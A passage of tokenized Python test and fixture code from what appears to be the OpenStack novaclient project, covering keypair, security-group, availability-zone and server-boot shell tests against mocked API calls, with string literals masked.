headers : <EOL> kwargs [ '<STR_LIT>' ] = response . headers . get ( '<STR_LIT>' ) <EOL> if ( issubclass ( cls , RetryAfterException ) and <EOL> '<STR_LIT>' in response . headers ) : <EOL> kwargs [ '<STR_LIT>' ] = response . headers . get ( '<STR_LIT>' ) <EOL> if body : <EOL> message = "<STR_LIT>" <EOL> details = "<STR_LIT>" <EOL> if hasattr ( body , '<STR_LIT>' ) : <EOL> if '<STR_LIT:message>' in body : <EOL> message = body . get ( '<STR_LIT:message>' ) <EOL> details = body . get ( '<STR_LIT>' ) <EOL> else : <EOL> error = body [ list ( body ) [ <NUM_LIT:0> ] ] <EOL> message = error . get ( '<STR_LIT:message>' ) <EOL> details = error . get ( '<STR_LIT>' ) <EOL> kwargs [ '<STR_LIT:message>' ] = message <EOL> kwargs [ '<STR_LIT>' ] = details <EOL> return cls ( ** kwargs ) <EOL> class ResourceNotFound ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from novaclient . tests . functional import base <EOL> from novaclient . tests . functional . v2 import fake_crypto <EOL> from novaclient . tests . functional . v2 . legacy import test_keypairs <EOL> class TestKeypairsNovaClientV22 ( test_keypairs . TestKeypairsNovaClient ) : <EOL> """<STR_LIT>""" <EOL> COMPUTE_API_VERSION = "<STR_LIT>" <EOL> def test_create_keypair ( self ) : <EOL> keypair = super ( TestKeypairsNovaClientV22 , self ) . test_create_keypair ( ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> def test_create_keypair_x509 ( self ) : <EOL> key_name = self . _create_keypair ( key_type = '<STR_LIT>' ) <EOL> keypair = self . _show_keypair ( key_name ) <EOL> self . assertIn ( key_name , keypair ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> def test_import_keypair ( self ) : <EOL> pub_key , fingerprint = fake_crypto . get_ssh_pub_key_and_fingerprint ( ) <EOL> pub_key_file = self . _create_public_key_file ( pub_key ) <EOL> keypair = self . _test_import_keypair ( fingerprint , pub_key = pub_key_file ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> def test_import_keypair_x509 ( self ) : <EOL> certif , fingerprint = fake_crypto . get_x509_cert_and_fingerprint ( ) <EOL> pub_key_file = self . _create_public_key_file ( certif ) <EOL> keypair = self . _test_import_keypair ( fingerprint , key_type = '<STR_LIT>' , <EOL> pub_key = pub_key_file ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> class TestKeypairsNovaClientV210 ( base . TenantTestBase ) : <EOL> """<STR_LIT>""" <EOL> COMPUTE_API_VERSION = "<STR_LIT>" <EOL> def test_create_and_list_keypair ( self ) : <EOL> name = self . name_generate ( "<STR_LIT>" ) <EOL> self . nova ( "<STR_LIT>" % ( name , self . user_id ) ) <EOL> self . addCleanup ( self . another_nova , "<STR_LIT>" % name ) <EOL> output = self . nova ( "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . _get_value_from_the_table , <EOL> output , name ) <EOL> output_1 = self . 
another_nova ( "<STR_LIT>" ) <EOL> output_2 = self . nova ( "<STR_LIT>" % self . user_id ) <EOL> self . assertEqual ( output_1 , output_2 ) <EOL> self . assertEqual ( name , self . _get_column_value_from_single_row_table ( <EOL> output_1 , "<STR_LIT:Name>" ) ) <EOL> output_1 = self . another_nova ( "<STR_LIT>" % name ) <EOL> output_2 = self . nova ( "<STR_LIT>" % ( self . user_id , <EOL> name ) ) <EOL> self . assertEqual ( output_1 , output_2 ) <EOL> self . assertEqual ( self . user_id , <EOL> self . _get_value_from_the_table ( output_1 , "<STR_LIT>" ) ) <EOL> def test_create_and_delete ( self ) : <EOL> name = self . name_generate ( "<STR_LIT>" ) <EOL> def cleanup ( ) : <EOL> o = self . another_nova ( "<STR_LIT>" ) <EOL> if name in o : <EOL> self . another_nova ( "<STR_LIT>" % name ) <EOL> self . nova ( "<STR_LIT>" % ( name , self . user_id ) ) <EOL> self . addCleanup ( cleanup ) <EOL> output = self . another_nova ( "<STR_LIT>" ) <EOL> self . assertEqual ( name , self . _get_column_value_from_single_row_table ( <EOL> output , "<STR_LIT:Name>" ) ) <EOL> self . nova ( "<STR_LIT>" % ( name , self . user_id ) ) <EOL> output = self . another_nova ( "<STR_LIT>" ) <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . _get_column_value_from_single_row_table , output , "<STR_LIT:Name>" ) </s>
<s> from oslo_serialization import jsonutils <EOL> from novaclient . tests . unit import fakes <EOL> from novaclient . tests . unit . fixture_data import base <EOL> class Fixture ( base . Fixture ) : <EOL> base_url = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> super ( Fixture , self ) . setUp ( ) <EOL> security_group_1 = { <EOL> "<STR_LIT:name>" : "<STR_LIT:test>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:id>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:id>" : <NUM_LIT:11> , <EOL> "<STR_LIT>" : { } , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } <EOL> } , <EOL> { <EOL> "<STR_LIT:id>" : <NUM_LIT:12> , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : { } <EOL> } <EOL> ] <EOL> } <EOL> security_group_2 = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:id>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> get_groups = { '<STR_LIT>' : [ security_group_1 , security_group_2 ] } <EOL> headers = self . json_headers <EOL> self . requests . register_uri ( '<STR_LIT:GET>' , self . url ( ) , <EOL> json = get_groups , <EOL> headers = headers ) <EOL> get_group_1 = { '<STR_LIT>' : security_group_1 } <EOL> self . requests . register_uri ( '<STR_LIT:GET>' , self . url ( <NUM_LIT:1> ) , <EOL> json = get_group_1 , <EOL> headers = headers ) <EOL> self . requests . register_uri ( '<STR_LIT>' , self . url ( <NUM_LIT:1> ) , status_code = <NUM_LIT> , <EOL> headers = headers ) <EOL> def post_os_security_groups ( request , context ) : <EOL> body = jsonutils . loads ( request . 
body ) <EOL> assert list ( body ) == [ '<STR_LIT>' ] <EOL> fakes . assert_has_keys ( body [ '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT:name>' , '<STR_LIT:description>' ] ) <EOL> return { '<STR_LIT>' : security_group_1 } <EOL> self . requests . register_uri ( '<STR_LIT:POST>' , self . url ( ) , <EOL> json = post_os_security_groups , <EOL> headers = headers , <EOL> status_code = <NUM_LIT> ) <EOL> def put_os_security_groups_1 ( request , context ) : <EOL> body = jsonutils . loads ( request . body ) <EOL> assert list ( body ) == [ '<STR_LIT>' ] <EOL> fakes . assert_has_keys ( body [ '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT:name>' , '<STR_LIT:description>' ] ) <EOL> return body <EOL> self . requests . register_uri ( '<STR_LIT>' , self . url ( <NUM_LIT:1> ) , <EOL> json = put_os_security_groups_1 , <EOL> headers = headers , <EOL> status_code = <NUM_LIT> ) </s>
<s> import six <EOL> from novaclient . tests . unit . fixture_data import availability_zones as data <EOL> from novaclient . tests . unit . fixture_data import client <EOL> from novaclient . tests . unit import utils <EOL> from novaclient . tests . unit . v2 import fakes <EOL> from novaclient . v2 import availability_zones <EOL> class AvailabilityZoneTest ( utils . FixturedTestCase ) : <EOL> from novaclient . v2 import shell <EOL> data_fixture_class = data . V1 <EOL> scenarios = [ ( '<STR_LIT>' , { '<STR_LIT>' : client . V1 } ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : client . SessionV1 } ) ] <EOL> def setUp ( self ) : <EOL> super ( AvailabilityZoneTest , self ) . setUp ( ) <EOL> self . availability_zone_type = self . _get_availability_zone_type ( ) <EOL> def _get_availability_zone_type ( self ) : <EOL> return availability_zones . AvailabilityZone <EOL> def _assertZone ( self , zone , name , status ) : <EOL> self . assertEqual ( zone . zoneName , name ) <EOL> self . assertEqual ( zone . zoneState , status ) <EOL> def test_list_availability_zone ( self ) : <EOL> zones = self . cs . availability_zones . list ( detailed = False ) <EOL> self . assert_request_id ( zones , fakes . FAKE_REQUEST_ID_LIST ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for zone in zones : <EOL> self . assertIsInstance ( zone , self . availability_zone_type ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( zones ) ) <EOL> l0 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l1 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> z0 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:0> ] ) <EOL> z1 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( len ( z0 ) , len ( z1 ) ) ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:1> ] ) <EOL> self . 
_assertZone ( z1 [ <NUM_LIT:0> ] , l1 [ <NUM_LIT:0> ] , l1 [ <NUM_LIT:1> ] ) <EOL> def test_detail_availability_zone ( self ) : <EOL> zones = self . cs . availability_zones . list ( detailed = True ) <EOL> self . assert_request_id ( zones , fakes . FAKE_REQUEST_ID_LIST ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for zone in zones : <EOL> self . assertIsInstance ( zone , self . availability_zone_type ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( zones ) ) <EOL> l0 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l1 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l2 = [ six . u ( '<STR_LIT>' ) , <EOL> six . u ( '<STR_LIT>' ) ] <EOL> l3 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l4 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l5 = [ six . u ( '<STR_LIT>' ) , <EOL> six . u ( '<STR_LIT>' ) ] <EOL> l6 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l7 = [ six . u ( '<STR_LIT>' ) , <EOL> six . u ( '<STR_LIT>' ) ] <EOL> l8 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> z0 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:0> ] ) <EOL> z1 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:1> ] ) <EOL> z2 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:1> ) , ( len ( z0 ) , len ( z1 ) , len ( z2 ) ) ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:1> ] , l1 [ <NUM_LIT:0> ] , l1 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:2> ] , l2 [ <NUM_LIT:0> ] , l2 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:0> ] , l3 [ <NUM_LIT:0> ] , l3 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:1> ] , l4 [ <NUM_LIT:0> ] , l4 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:2> ] , l5 [ <NUM_LIT:0> ] , l5 [ <NUM_LIT:1> ] ) <EOL> self . 
_assertZone ( z1 [ <NUM_LIT:3> ] , l6 [ <NUM_LIT:0> ] , l6 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:4> ] , l7 [ <NUM_LIT:0> ] , l7 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z2 [ <NUM_LIT:0> ] , l8 [ <NUM_LIT:0> ] , l8 [ <NUM_LIT:1> ] ) </s>
<s> import argparse <EOL> import base64 <EOL> import datetime <EOL> import os <EOL> import fixtures <EOL> import mock <EOL> from oslo_utils import timeutils <EOL> import six <EOL> from six . moves import builtins <EOL> import novaclient <EOL> from novaclient import api_versions <EOL> from novaclient import base <EOL> import novaclient . client <EOL> from novaclient import exceptions <EOL> import novaclient . shell <EOL> from novaclient . tests . unit import utils <EOL> from novaclient . tests . unit . v2 import fakes <EOL> import novaclient . v2 . shell <EOL> FAKE_UUID_1 = fakes . FAKE_IMAGE_UUID_1 <EOL> FAKE_UUID_2 = fakes . FAKE_IMAGE_UUID_2 <EOL> class ShellFixture ( fixtures . Fixture ) : <EOL> def setUp ( self ) : <EOL> super ( ShellFixture , self ) . setUp ( ) <EOL> self . shell = novaclient . shell . OpenStackComputeShell ( ) <EOL> def tearDown ( self ) : <EOL> if hasattr ( self . shell , '<STR_LIT>' ) : <EOL> self . shell . cs . clear_callstack ( ) <EOL> super ( ShellFixture , self ) . tearDown ( ) <EOL> class ShellTest ( utils . TestCase ) : <EOL> FAKE_ENV = { <EOL> '<STR_LIT>' : '<STR_LIT:username>' , <EOL> '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ShellTest , self ) . setUp ( ) <EOL> for var in self . FAKE_ENV : <EOL> self . useFixture ( fixtures . EnvironmentVariable ( var , <EOL> self . FAKE_ENV [ var ] ) ) <EOL> self . shell = self . useFixture ( ShellFixture ( ) ) . shell <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * args , ** kwargs : fakes . FakeClient ( * args , ** kwargs ) ) ) <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = six . StringIO ) <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = six . 
StringIO ) <EOL> def run_command ( self , cmd , mock_stderr , mock_stdout , api_version = None ) : <EOL> version_options = [ ] <EOL> if api_version : <EOL> version_options . extend ( [ "<STR_LIT>" , api_version , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if isinstance ( cmd , list ) : <EOL> self . shell . main ( version_options + cmd ) <EOL> else : <EOL> self . shell . main ( version_options + cmd . split ( ) ) <EOL> return mock_stdout . getvalue ( ) , mock_stderr . getvalue ( ) <EOL> def assert_called ( self , method , url , body = None , ** kwargs ) : <EOL> return self . shell . cs . assert_called ( method , url , body , ** kwargs ) <EOL> def assert_called_anytime ( self , method , url , body = None ) : <EOL> return self . shell . cs . assert_called_anytime ( method , url , body ) <EOL> def test_agents_list_with_hypervisor ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_agents_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_agents_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_agents_modify ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : { <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } } ) <EOL> def test_boot ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_image_with ( self ) : <EOL> self . run_command ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_key ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_user_data ( self ) : <EOL> testfile = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> with open ( testfile ) as testfile_fd : <EOL> data = testfile_fd . read ( ) . encode ( '<STR_LIT:utf-8>' ) <EOL> expected_file_data = base64 . b64encode ( data ) . decode ( '<STR_LIT:utf-8>' ) <EOL> self . run_command ( <EOL> '<STR_LIT>' % testfile ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : expected_file_data <EOL> } } , <EOL> ) <EOL> def test_boot_avzone ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } } , <EOL> ) <EOL> def test_boot_secgroup ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_config_drive ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True <EOL> } } , <EOL> ) <EOL> def test_boot_access_ip ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } } , <EOL> ) <EOL> def test_boot_config_drive_custom ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } } , <EOL> ) <EOL> def test_boot_invalid_user_data ( self ) : <EOL> invalid_file = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % invalid_file ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_no_image_no_bdms ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_no_flavor ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_no_image_bdms ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_image_bdms_v2 ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT:image>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_no_image_bdms_v2 ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> cmd = '<STR_LIT>' <EOL> self . run_command ( cmd ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> cmd = '<STR_LIT>' <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:blank>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . 
